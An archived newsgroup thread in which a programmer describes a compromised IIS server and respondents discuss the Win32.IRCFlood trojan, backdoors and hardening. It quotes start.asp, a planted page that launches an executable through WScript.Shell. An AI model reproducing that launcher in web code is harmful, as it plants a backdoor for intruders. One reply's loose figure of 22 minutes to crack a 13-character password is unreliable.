Hi all,

my company has several servers acting as web servers hosted at an ISP and
one of them was compromised by some warez bunnies.
All the server have the latest patches and anti virus software running, but
no firewall...

Several files appeared in a folder off one of the webs, being

kill.exe
shellconfig.ocx
shellsuccesslog.ocx
win.asp
start.asp
shellhost32.exe


win.asp has a title of "Hacking a pub tut by Skkwiddly. Wa2001", and
start.asp reads as follows

<%
CreateObject("WScript.Shell").Run("shellhost32.exe")
%>
<h1>Yes, you made it!! Good job dude!<\h1>


My question is, has anyone encountered this and how do they get the files
there. Two questions, really.

Any help would be greatly appreciated, as they uploaded a significant amount
of german dvd's and other garbage onto the server at our expense.


Regards,

Paul Korosi

On Wed, 6 Apr 2005 20:45:35 +1000, "Saturday Night Paulsy"
<pkor***@redpepper.com.au> wrote:

Show quoteHide quoteTo find out how they got there, check your audit logs and firewall
logs.  Oh yeah, you already figured out that they got there because
you weren't secured and had no firewall.  Likely you weren't auditing
either.  Possibly hadn't turned off anonymous file upload in FTP.
Possibly your host got hacked.  Possibly a SQL attack.  Possibly using
"password" as a password wasn't that smart.  Too many possiblys for
anyone to tell you for sure.

Bummer.  Flatten the box, resinstall from scratch, patch, secure and
get that firewall installed.  Live and learn.

Jeff

ha ha  - nice one Jeff,

I might be dumb but I aint that stupit. I admit I am no security
specialist - I'm a programmer. I thought someone here
might be able to shed some light, judging by the responses to the questions
in this group, some of which quite frankly
don't even belong in this group.

As for your suggestions, administrator only ftp access, 13 character strong
password - it would even take YOU a
century to work it out. All database submissions/request are filtered
against SQL injection attacks using regex.  I simply
can't see any way in via that side.

Anyways - it turns out its the Win32.IRCFlood trojan, and appears to be
fairly new as the only patch available to deal with it
is dated yesterday. And, as my MSCE friend has just told me (after some
research), firewalls won't necessarily stop it from getting on
the box - only stop the gigs of sh*te from getting put on.

For anyone that might be interested, it was probably downloaded by someone
doing "legit" work on the box by browsing. thats what
the msce told me, anyways - and he's a good deal brighter than your average
minesweeper certified solitaire expert.

Finally, thanks for your help. Next time I reckon I'll just fart 'cause
it'll save all this typing time. I could've been drinking coffee instead.


Show quoteHide quote

On Thu, 7 Apr 2005 11:36:15 +1000, "Saturday Night Paulsy"
<pkor***@redpepper.com.au> wrote:

A 13 character string, assuming you didn't use high-ASCII characters
since they're awfully hard to type in a password, is about 22 minutes
to crack.  Less if I can use an exploit to get the SAM database on an
unpatched system.  Is FTP set to lock out the user after x number of
failed attempts?

It's the ways you can't see that come back to bite you.  Are you using
a standard port for SQL?  Is *every* query parameterized ans using
stored procedures?

The Win32.IRCFlood!Trojan is several years old, and the major AV
vendors have detected it for quite a while.  This may be a newer
variant, but even those should be detected.  The older version used
IRC ports for control, which would normally be blocked by a firewall
on a system that didn't have IRC clients/servers running.

The major problem you have now though is that this trojan allows
control of the system through a backdoor it installs.  You may have
found and removed the trojan, but do you know what other changes have
been made to the system?  Possibly none, but you don't have the
logging in place to do the forensics to be sure.

The advice still stands.  Flatten the box and reinstall.

The trojan in question is normally delivered via an executable, which
when run installs the trojan and opens the backdoors.  I haven't seen
any newer attack vectors for it, but then I haven't looked either.  A
new variant may have a new vector.  Or something else you haven't
detected may be on the box as well.

Next time, go ahead and fart *and* save the typing time.  But install
and correctly configure a firewall.  Configure auditing.  Install and
use the latest version of your AV software.  Security isn't a singular
event, it's an ongoing process.  Fortunately, you can still drink your
coffee while monitoring it.

Jeff


Show quoteHide quote

IIS 6 Integrated Authentication and IE 6 - security credentials seem to not get passed from browser
Anonymous access
Getting prompted on IIS web
Anonymous access Vulnerabilities
W2003 SP1 - IIS CRL Check
What is HTTP compression ?
IE browser "NO COOKIES" is ignored for 1 site; works for another; same scripts (Cross-posted to inet
ASP.NET making COM calls on IIS6
Passing credentials from IIS to another resource
Crashing IIS